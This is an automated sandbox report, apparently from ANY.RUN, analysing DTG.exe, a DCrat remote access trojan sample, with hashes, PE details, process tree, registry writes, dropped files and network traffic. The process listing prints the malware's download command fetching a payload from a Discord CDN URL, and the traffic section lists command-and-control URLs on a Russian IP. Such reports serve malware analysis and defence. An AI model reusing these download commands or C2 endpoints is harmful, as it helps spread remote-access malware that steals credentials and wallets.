File name: | DTG.exe |
Full analysis: | https://app.any.run/tasks/eb0e4dd3-161c-447a-92bb-e215f1b861b2 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | November 29, 2020, 19:14:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (console) Intel 80386, for MS Windows |
MD5: | 2202DF2D04172620A865284C25468C40 |
SHA1: | 24514BDBB2745C465AD9C33B1D54283DB5491EEC |
SHA256: | 9C1933510DB0DBB9FF278BA0E636073BBFF613040BE71AE3CA3DF0194C946011 |
SSDEEP: | 6144:j5aWbksiNTBOmOBUfLXwNvkJqEeWFiUxmgsDj/vuWqzS8GI2RR:j5atNTAmOBSXwNkJTokmgsHHuWqO8D23 |
.exe | | | Win32 Executable MS Visual C++ (generic) (41) |
---|---|---|
.exe | | | Win64 Executable (generic) (36.3) |
.dll | | | Win32 Dynamic Link Library (generic) (8.6) |
.exe | | | Win32 Executable (generic) (5.9) |
.exe | | | Win16/32 Executable Delphi generic (2.7) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2018:02:01 21:18:05+01:00 |
PEType: | PE32 |
LinkerVersion: | 2.5 |
CodeSize: | 70144 |
InitializedDataSize: | 285184 |
UninitializedDataSize: | - |
EntryPoint: | 0x1000 |
OSVersion: | 4 |
ImageVersion: | - |
SubsystemVersion: | 4 |
Subsystem: | Windows command line |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_CUI |
Compilation Date: | 01-Feb-2018 20:18:05 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 5 |
Time date stamp: | 01-Feb-2018 20:18:05 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.code | 0x00001000 | 0x0000387E | 0x00003A00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 5.52797 |
.text | 0x00005000 | 0x0000D642 | 0x0000D800 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.54615 |
.rdata | 0x00013000 | 0x000033A8 | 0x00003400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.11033 |
.data | 0x00017000 | 0x0000178C | 0x00001200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 5.10093 |
.rsrc | 0x00019000 | 0x00041400 | 0x00041400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.99849 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.92322 | 611 | Latin 1 / Western European | UNKNOWN | RT_MANIFEST |
37CC762889D89ED82B0F8082A787488D8B52E439 | 2.58496 | 6 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
8107AD4234DBDB426EEC4E3586EF4342434CDF41 | 5.64022 | 60 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
96BBCF029C0AF068638AFC587F789E0BE99E822F | 7.99928 | 265216 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
BB566DB6B3319380E8F5ADC2C374C570 | 3.23593 | 14 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
E17710310A95EDFDDFE85FA8E27B3996AE7CD060 | 6.84502 | 174 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
F2C9BF06DC | 0 | 1 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
F6FC11950B9994DF94408CA6FCCFB624 | 7.10232 | 240 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
COMCTL32.DLL |
GDI32.DLL |
KERNEL32.dll |
MSVCRT.dll |
OLE32.DLL |
SHELL32.DLL |
SHLWAPI.DLL |
USER32.DLL |
WINMM.DLL |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2312 | "C:\Users\admin\AppData\Local\Temp\DTG.exe" | C:\Users\admin\AppData\Local\Temp\DTG.exe | explorer.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3928 | "C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\776C.bat C:\Users\admin\AppData\Local\Temp\DTG.exe" | C:\Windows\system32\cmd.exe | DTG.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1892 | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/781961547324063799/782685559528882216/file.exe" "file.exe" "" "" "" "" "" "" | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe | cmd.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
376 | file.exe | C:\Users\admin\AppData\Local\Temp\18133\file.exe | cmd.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2028 | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe "" "" "" "" "" "" "" "" "" | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe | — | cmd.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2084 | "C:\Windows\System32\WScript.exe" "C:\fontwin\kvJ4bXdZaMAubDuToPWQkvZAJ3aT3u.vbe" | C:\Windows\System32\WScript.exe | — | file.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1760 | cmd /c ""C:\fontwin\S6zcPlhbe4N8j5sbAT8oa6BArAd5HN.bat" " | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2512 | ZBBZyltbXV8x7QWBSaxb.exe -p05dfc7f67816f98eb3a762f823599b3a58c6c582 | C:\fontwin\ZBBZyltbXV8x7QWBSaxb.exe | cmd.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
732 | "C:\Windows\System32\WScript.exe" "C:\fontwin\N4epcgQecAnjyygw8SG45FKiobRBj4.vbe" | C:\Windows\System32\WScript.exe | — | ZBBZyltbXV8x7QWBSaxb.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1108 | cmd /c ""C:\fontwin\uuvtFWrWhfSvv75Tqpu9K4c9X9ZOi7.bat" " | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
(PID) Process: | (376) file.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (376) file.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2084) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2084) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2512) ZBBZyltbXV8x7QWBSaxb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2512) ZBBZyltbXV8x7QWBSaxb.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (732) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (732) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (956) intomonitor.exe | Key: | HKEY_CURRENT_USER\Software\85ea072a9e5a5bbfb99441627ffd39601d90bbdd |
Operation: | write | Name: | 0107c07d5c5a9e83a2c81dca62131af7ba08ed5b |
Value: PCQ+QzpcUHJvZ3JhbURhdGFcQXBwbGljYXRpb24gRGF0YVxzbXNzLmV4ZTwkPkM6XGZvbnR3aW5cY3Nyc3MuZXhlPCQ+QzpcVXNlcnNcYWRtaW5cRG9jdW1lbnRzXE15IE11c2ljXElNRURJQ1RVUERBVEUuZXhl | |||
(PID) Process: | (1004) IMEDICTUPDATE.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IMEDICTUPDATE_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3928 | cmd.exe | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\777D.tmp | — | |
MD5:— | SHA256:— | |||
2512 | ZBBZyltbXV8x7QWBSaxb.exe | C:\fontwin\N4epcgQecAnjyygw8SG45FKiobRBj4.vbe | vbe | |
MD5:F17F0E353FF2E0748C45D184FCEF0F6D | SHA256:39A04084B03EED5307597DB5CA334E120D65E30753B26B6B04B2125F2E183D7F | |||
2512 | ZBBZyltbXV8x7QWBSaxb.exe | C:\fontwin\uuvtFWrWhfSvv75Tqpu9K4c9X9ZOi7.bat | text | |
MD5:F53F2D3486BCADFEBF99B50787D63EF8 | SHA256:B280C295172C0BF15D05D01E68177D89780B3C16B6C1FB54BA137DE6E084426F | |||
2312 | DTG.exe | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\776C.bat | text | |
MD5:71E858EEF1A50FBB9EDCD47FAAD181A2 | SHA256:37BDCDA9090CDBA6C74B870121D1764BC2355B0DE8DF5BEE8E8998287084B948 | |||
376 | file.exe | C:\fontwin\S6zcPlhbe4N8j5sbAT8oa6BArAd5HN.bat | text | |
MD5:9E93AC61E632B5701EDCE91203A1D3B1 | SHA256:D0BDB40BE60214CEAFE39813BB98FA729887CA5BC23D966DEAC3F33C6CEA36AA | |||
1892 | extd.exe | C:\Users\admin\AppData\Local\Temp\file.exe | executable | |
MD5:78843008C87987BA38BDC904B2D0AA6B | SHA256:A3768890FC31193053B505A954378E3C936F257D8ECB86F47037CBA861B81969 | |||
956 | intomonitor.exe | C:\ProgramData\69ddcba757bf72f7d36c464c71f42baab150b2b9 | text | |
MD5:1F0B918E693269B3FF4C2745BA1D6515 | SHA256:1488D24D2740ACD5070A6C05FBDCEC751F47B9FD0C36ED755070CDB97441E911 | |||
956 | intomonitor.exe | C:\fontwin\886983d96e3d3e31032c679b2d4ea91b6c05afef | text | |
MD5:9E2A65D4ED11D45BE5069F45C71A9064 | SHA256:6879613416461C05A7E53DD678CD51B3E15D3EB8BB7F846837BDAB951B8B3FF0 | |||
2512 | ZBBZyltbXV8x7QWBSaxb.exe | C:\fontwin\intomonitor.exe | executable | |
MD5:CF169BD95835AE629C02622DAAC7A047 | SHA256:5F452C934A5C0E7558FE7F0592E93E2A21A7DEE08E3A334AC98502C5E1A082E7 | |||
376 | file.exe | C:\fontwin\ZBBZyltbXV8x7QWBSaxb.exe | executable | |
MD5:2AD38CA67FC0883303D9FC98F6939EF5 | SHA256:87E96FDFD3674E5487425A6169CBC11613F8E3B2C5AEBDF7BCFFCE8ABF61D2A5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 151.139.128.14:80 | http://ocsp.comodoca4.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTOpjOEf6LG1z52jqAxwDlTxoaOCgQUQAlhZ%2FC8g3FP3hIILG%2FU1Ct2PZYCEQD5g7jF84adhvw3B5kCUueb | US | der | 280 b | whitelisted |
— | — | GET | 200 | 151.139.128.14:80 | http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrJdiQ%2Ficg9B19asFe73bPYs%2BreAQUdXGnGUgZvJ2d6kFH35TESHeZ03kCEFslzmkHxCZVZtM5DJmpVK0%3D | US | der | 313 b | whitelisted |
— | — | GET | 200 | 151.139.128.14:80 | http://crl.comodoca.com/AAACertificateServices.crl | US | der | 506 b | whitelisted |
1004 | IMEDICTUPDATE.exe | GET | 200 | 212.109.216.114:80 | http://212.109.216.114/wmu7nzj48bdc5sfsivxxqwbhwvytre7ez/ramh92gnmgzspukfiow6z3w4k0syktrjibaovdmcgqze53rv3d1h85hs16t5jnjdcbefq1qi76n4poo8cf/dcbb3f0abca3117648fdcab13b68e1162ddbc275.php?Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH&8e9835d38dff946e24408bfe4ab24496=d3981f3ee160cf75a0df452d812fb5e4&Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH | RU | text | 71 b | malicious |
1004 | IMEDICTUPDATE.exe | GET | 200 | 212.109.216.114:80 | http://212.109.216.114/wmu7nzj48bdc5sfsivxxqwbhwvytre7ez/ramh92gnmgzspukfiow6z3w4k0syktrjibaovdmcgqze53rv3d1h85hs16t5jnjdcbefq1qi76n4poo8cf/dcbb3f0abca3117648fdcab13b68e1162ddbc275.php?Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH&b5734a889a7eac7932861e019fed7999=2c673e0ac932abf7a843ea57933688a6&ca43f36379411f81492585e899d11eea=afbddd404b6e908834ec01647b97c946c53a6d64&Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH | RU | text | 150 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1004 | IMEDICTUPDATE.exe | 212.109.216.114:80 | — | JSC ISPsystem | RU | malicious |
1892 | extd.exe | 162.159.134.233:443 | cdn.discordapp.com | Cloudflare Inc | — | shared |
— | — | 151.139.128.14:80 | crl.comodoca.com | Highwinds Network Group, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
cdn.discordapp.com |
| shared |
crl.comodoca.com |
| whitelisted |
ocsp.comodoca4.com |
| whitelisted |